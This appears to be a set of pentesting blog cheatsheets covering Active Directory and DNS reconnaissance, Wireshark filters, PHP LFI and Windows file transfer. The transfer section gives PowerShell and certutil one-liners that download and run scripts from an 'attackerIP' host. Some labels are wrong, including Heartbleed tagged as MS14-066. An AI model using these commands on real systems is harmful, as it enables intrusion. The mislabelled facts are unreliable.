Enumeration Cheatsheets

Bloodhound Cheatsheet – Custom Queries, Neo4j, etc.

This document contains both Custom Queries that you can import/run directly in Bloodhound, as well as as custom queries that you can run from within the Neo4j GUI directly.

Importing Custom Queries to Bloodhound

CompassSecurity / BloodHoundQueries

There is an awesome project over at https://github.com/CompassSecurity/BloodHoundQueries. You can quickly install the custom queries by running the following commands in Linux.

cd /root/.config/bloodhound
curl -o "customqueries.json" "https://raw.githubusercontent.com/CompassSecurity/BloodHoundQueries/master/customqueries.json"

Once downloaded, just restart Bloodhound and you’ll see the Custom Queries available.

Within Neo4j GUI

In the Neo4j console (by default http://localhost:7474/browser/), you can run your own queries to get data out of the Bloodhound database. I like to do this for ease of copy/paste when report writing.

Find all computers that have an unsupported Operating System.

MATCH (H:Computer) WHERE H.operatingsystem =~ '.(2000|2003|2008|xp|vista|7).' RETURN H.name, H.operatingsystem

Find all enabled users who are member of a particular group, such as Domain Admins.

MATCH (u:User)-[:MemberOf]->(g:Group {name:'DOMAIN ADMINS@<domain>'}) WHERE u.enabled = TRUE return u.name

Find all users that contain a keyword.

MATCH (u:User) WHERE u.name CONTAINS "<keyword>" return u.name, u.displayname, u.description, u.group
Enumeration Cheatsheets

Wireshark Filters Cheatsheet

There are literally hundreds of these type of posts on the internet, with one of my favorites being https://wiki.wireshark.org/CaptureFilters. However, I wanted to create this ‘short’ list that contains my favorite go-to’s after performing Man in the Middle attacks.

This post will be updated as time goes on.

Understanding the Packet Capture

Before diving too deep, it’s always a good idea to get an idea of what type of traffic was captured so you know which filters to apply.

Viewing Protocol Statistics:
In the Menu, click on Statistics and select Protocol Hierarchy.

Filtering HTTP

If non-encrypted HTTP traffic was captured, we may be able to extract juicy details.

View all plaintext HTTP GET requests:
http.request.method == "GET"

View all plaintext HTTP POST requests:
http.request.method == "POST"

Filtering by specific redirect location:
http.location == login_success.php

To export HTTP objects (such as images or pages):
Select File. Click on Export Objects, and then HTTP.

Remember to always Right-Click a packet, and Follow the TCP Stream to get more details from the raw data.

Filtering FTP

FTP is pretty simple, since all traffic is sent in plaintext.

To view all FTP related traffic:

To export FTP objects (such as transferred files):
Select File. Click on Export Objects, and then TFTP.

Remember to always Right-Click a packet, and Follow the TCP Stream to get more details from the raw data.

Filtering SMB

SMB is a favorite to capture, as it is usually not encrypted and you may be able to exfiltrate files over the wire.

To view packets related to SMB files:

To export SMB objects (such as transferred files):
Select File. Click on Export Objects, and then SMB.

Enumeration Cheatsheets

Active & Passive Recon Cheatsheet

This post contains various commands and methods for performing passive recon of a target. This article will be expanded upon as time goes on.

Performing Whois lookups

We can utilize public WHOIS databases to perform lookups on domains.

It may also be worthwhile utilizing other services, such as Namecheap. Once you know who the registrar is, it is typically best to perform a Whois lookup for your target using their domain registrar.

We can also utilize a Kali terminal for this:
whois <targetDomain>

You can use additional options to instruct the tool to use a different server.
whois -h whois.godaddy.com <targetDomain>

Performing DNS enumeration with Nslookup

To perform a lookup of the A records against a particular domain:
nslookup <targetDomain>

To look up the mail records:
nslookup -query=mx <targetDomain>

To look up Nameservers:
nslookup -query=ns <targetDomain>

To get all records that are available:
nslookup -query=any <targetDomain>

You can also drop into nslookup with no parameters interactively.

While interactively working with nslookup, you can set your query:
set q=mx

You can also set your server if you wanted to query a different DNS server than your default one:

Performing DNS enumeration with Dig

To extract A records and Namerservers of a domain:
dig <targetDomain>

To query just A records:
dig <targetDomain> A

You can also limit the output to a specific record, and just return the answer section:
dig +nocmd <targetDomain> MX +noall +answer

Can attempt a DNS Zone transfer:
dig +nocmd <targetDomain> AXFR +noall +answer @<targetDNSServer>

To see more about a DNS Zone Transfer, see https://infinitelogins.com/2020/04/23/performing-dns-zone-transfer/

Automating DNS Enumeration

Fierce can be used to enumerate subdomains, IP ranges, and hostnames by using public DNS queries, zone transfer attempts, and brute forcing techniques.
fierce -dns <targetDomain>

You can also specify a specific DNS server for the tool to use.
fierce -dns <targetDomain> -dnsserver <targetNamserver>

We can also leverage a tool called DNSEnum to do something similar. It will look for the A records of the target domain, looks up the NS and MX records. Finally, it will attempt a zone transfer attack.
dnsenum <targetDomain>

You can also specify a specific DNS server for the tool to use. Sometimes the results will differ.
dnsenum <targetDomain> --dnsserver <targetNamserver>

You can use DNSEnum to brute force subdomains as well.
dnsenum <targetDomain> -f <dictionaryList>

DNSMap can also be used, but it doesn’t do much other than brute-force with a built-in wordlist.
dnsmap <targetDomain> -w wordlist.txt -r /tmp/results.txt

DNSMap to enumerate subdomains in bulk fashion:
dnsmap-bulk.sh domains.txt /tmp/results.txt

DNSRecon is an ‘all-in-one’ tool that can do most everything.
dnsrecon -d <targetDomain>

Google and Bing Dorking

Bing offers a query filter that returns websites hosted on a given IP address by entering the following Bing search:

Search Google for results within a particular website:

Search Google for specific filetypes:
insite:<targetURL> filetype:pdf

Search Google for particular text in title:
insite:<targetURL> intitle:admin
insite:<targetURL> intitle:index of

Search Google for particular text in body:
insite:<targetURL> intext:admin
insite:<targetURL> intext:index of

Additional payloads are found here. https://gist.github.com/clarketm/919457847cece7ce40323dc217623054

Various Tools:

Tips & Tricks

Exploiting PHP Based LFI

Different PHP Methods

There are two different methods that will create an LFI if not used correctly. Those two are:

file_get_contents() – This is going to just display the text within the file by reading the contents as a string, and will not interpret PHP code for execution. If the LFI is using this method, you can only enumerate files on the filesystem.

include() – This is going to execute everything within the PHP tag as actual PHP code. If the LFI is using this method, then we SHOULD be able to get command execution.

You can tell which method is being used by using the LFI to read the PHP file that causes the LFI.

  • If the source code IS displayed, then the PHP code was interpreted by the server and you have a file_get_content() LFI.
  • If the code is NOT displayed, then you have an include().

Example: Say your request looks like this:

GET /news.php?file=../news.php

Because the source code is visible in the response, we can assume we’re working with a file_get_content() LFI with no possibility of code execution.

Files to check while enumerating LFI:


To get the username of who we’re running as:

To see what binary is running this service:

If you have Tomcat running as well, you may want to enumerate these:


Note: Make sure to adjust the version number located in the path.

Tips & Tricks

Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them.

Uploading and Hosting Files

Python Web Server

The following will start a webserver in the present working directory using Python2.
python -m SimpleHTTP Server 80

The following will start a webserver in the present working directory using Python3.
python3 -m http.server 80

Impacket SMB Server

You can download Impacket from Github.

We’ll need to perform a few steps to set this up, but it’s a great way to transfer files to/from a system. To begin, let’s create a directory called smb on our attacking system. Files in this directory will be available on the other end, and likewise, the other end will be able to place files into this directory.
mkdir smb
impacket-smbserver <sharename> `<path>`

Then we can mount this file share in PowerShell from the other side.
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>

And change into the new drive.
cd <ShareName>:

Additional Method With Authentication:

On our Kali machine, we’ll start our Impacket server while in the directory we wish to host.
sudo impacket-smbserver <shareName> $(pwd) -smb2support -user <user> -p <password>

Then on the Windows machine, we’ll connect back to this SMB share, but we’ll need to specify the credentials mentioned in the above command. To do that, we’ll use the following commands:

$pass = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<user>', $pass)
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName> -Credential $cred

Downloading Files


The following will download and store a remote file to disk.
Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"

The following will download and automatically execute the remote PowerShell script when ran from a command prompt.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')

An alternative to the above is to use Invoke-WebRequest in a different manner.
powershell.exe "IEX (IWR http://attackerIP/file.ps1 -UseBasicParsing)"


The following will download and store a remote file to disk.
certutil.exe -urlcache -f "http://attackerIP/file.exe" file.exe

Windows Defender

The following will download and store a remote file to disk.
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

Transferring with SSH

To copy a file from B to A while logged into B:
scp /path/to/file username@a:/path/to/destination

To copy a file from B to A while logged into A:
scp username@b:/path/to/file /path/to/destination

Transferring via Base64 Encoding

From within a PowerShell session, you may want to encode the file into Base64 format so you can just copy it down to your destination machine and decode it on the other side. This is handy for transferring small files.

Within PowerShell, you can encode a file by running:

$file-contents = Get-Content "filename.txt"
$file-encode = [System.Text.Encoding]::UTF8.GetBytes($file-contents)

Then, within Kali, you can decode it using the following:
echo -n <base64String> | base64 -d > filename.txt

This should create the file for you to interact with.

Pentesting, Tips & Tricks

Hacking Methodology Cheatsheet

This post is going to contain a list of common tools, vulnerabilities, & methodology tactics broken down by category and contains links to references that will showcase examples. This document will be updated often as I work through more and more resources.

Enumerating Common Services

Enumerating SMB 139,445

  • Using smbmap and smbclient to crawl and browse shares. Example of this in HTB FriendZone – Link to Ippsec video.

Enumerating LDAP 389

External Tools/Methodology

Using Hydra to Brute-Force Websites

Using ASP/ASPX Webshells

Enumerating Tomcat

Enumerating HTTP Proxies

Connecting to/Abusing IRC

Performing Zone Transfers

Local/Remote File Inclusion (LFI & RFI)

  • Using PHP Wrappers within LFI to Obtain PHP Script Source Code — My post
  • XML Entity Injection (XXE) Vuln for LFI. HackTheBox: DevOops. – Link to Ippsec Video

Privilege Escalation Techniques/Tools

Privilege Escalation: Using Sherlock

Privilege Escalation: Using Windows-Exploit-Suggester

Pivoting & Utilizing Proxies

Routing Tools Through Proxies

Common Vulnerabilities

Exploiting MS17-010 (EternalBlue)

  • HackTheBox: Blue

Exploiting MS14-066 (Heartbleed)

Exploiting CVE-2016-5195 (DirtyCow)

Common Active Directory Attacks

Abusing LLMNR/NBT-NS w/ Responder

Abusing IPv6

Utilizing CrackMapExec